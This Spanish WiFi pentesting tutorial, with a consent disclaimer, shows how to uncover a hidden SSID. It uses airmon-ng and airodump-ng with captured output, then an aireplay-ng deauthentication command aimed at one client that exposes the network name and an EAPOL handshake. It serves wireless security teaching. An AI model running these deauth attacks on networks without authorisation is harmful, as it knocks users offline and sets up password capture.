🌐Redes ocultas

En esta sección vamos a hacer ataques a redes WiFi que se encuentran ocultas o no visibles al público general.

Disclaimer: Vamos a realizar ataques a redes WiFi, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo

Configurar red oculta

En el panel de control del WiFi habilitar la opción "Esconder SSID":

No aparece en la lista de redes wifi, y al conectarnos nos muestra este mensaje:

Detectar red con el SSID oculto

# 1 - Apagamos el adaptador wlan0
ifconfig wlan0 down

# 2 - Iniciamos airmon-ng
sudo airmon-ng start wlan0

# 3- Encontrar al objetivo
sudo airodump-ng wlan0

CH  1 ][ Elapsed: 1 min ][ 2023-11-02 10:22 ][ paused output

 BSSID              PWR  Beacons  #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 EA:66:AB:4C:31:OA  -56       55      0    0   1  720   WPA2 CCMP   PSK  <length:  0>
                                                                        |------------|
# El ESSID <length:  0> nos indica que tiene el SSID oculto
# Dependiendo del tipo de cifrado puede mostrar el número de caracteres

Ver dispositivos en una red oculta

# 4 - Iniciamos airodump-ng con el BSSID objetivo y su CHANNEL
sudo airodump-ng --bssid EA:66:AB:4C:31:OA --channel 1 wlan0

 CH  1 ][ Elapsed: 2 mins ][ 2023-11-02 10:38 ][ paused output

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 EA:66:AB:4C:31:EA  -53  48      307       57    0   1  720   WPA2 CCMP   PSK  <length:  0>
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 EA:66:AB:4C:31:OA  CE:C1:C0:DB:DF:1F  -15    0 -24      0      402
                   |-----------------|

Ataque: Desvelar SSID

Debemos realizar un deauth a algún dispositivo de la red para que desvele el SSID en la reconexión:

# Solamente necesitamos enviar 1 paquete para este ataque
sudo aireplay-ng --deauth 1 -a EA:66:AB:4C:31:OA -c CE:C1:C0:DB:DF:1F wlan0

10:44:28  Waiting for beacon frame (BSSID: EA:66:AB:4C:31:EA) on channel 1
10:44:28  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|62 ACKs]
10:44:29  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|63 ACKs]
10:44:29  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 4|59 ACKs]
10:44:30  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [38|59 ACKs]
10:44:31  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [43|60 ACKs]
10:44:31  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [47|62 ACKs]
10:44:32  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [43|60 ACKs]
10:44:32  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [12|85 ACKs]
10:44:33  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 6|63 ACKs]
10:44:33  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|60 ACKs]
10:44:34  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|61 ACKs]
10:44:34  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|63 ACKs]
10:44:35  Sending 64 directed DeAuth (code 7). STMAC: [CE:C1:C0:DB:DF:1F] [ 0|62 ACKs]

 CH  1 ][ Elapsed: 10 mins ][ 2023-11-02 10:46 ][ paused output

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 EA:66:AB:4C:31:EA  -49  58     2885      290    0   1  720   WPA2 CCMP   PSK  INHACKEABLE                                                                                

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 EA:66:AB:4C:31:OA  CE:C1:C0:DB:DF:1F  -61    1e- 1      0     3899  EAPOL  INHACKEABLE  

Como podemos ver ahora si se muestra el SSID de la red.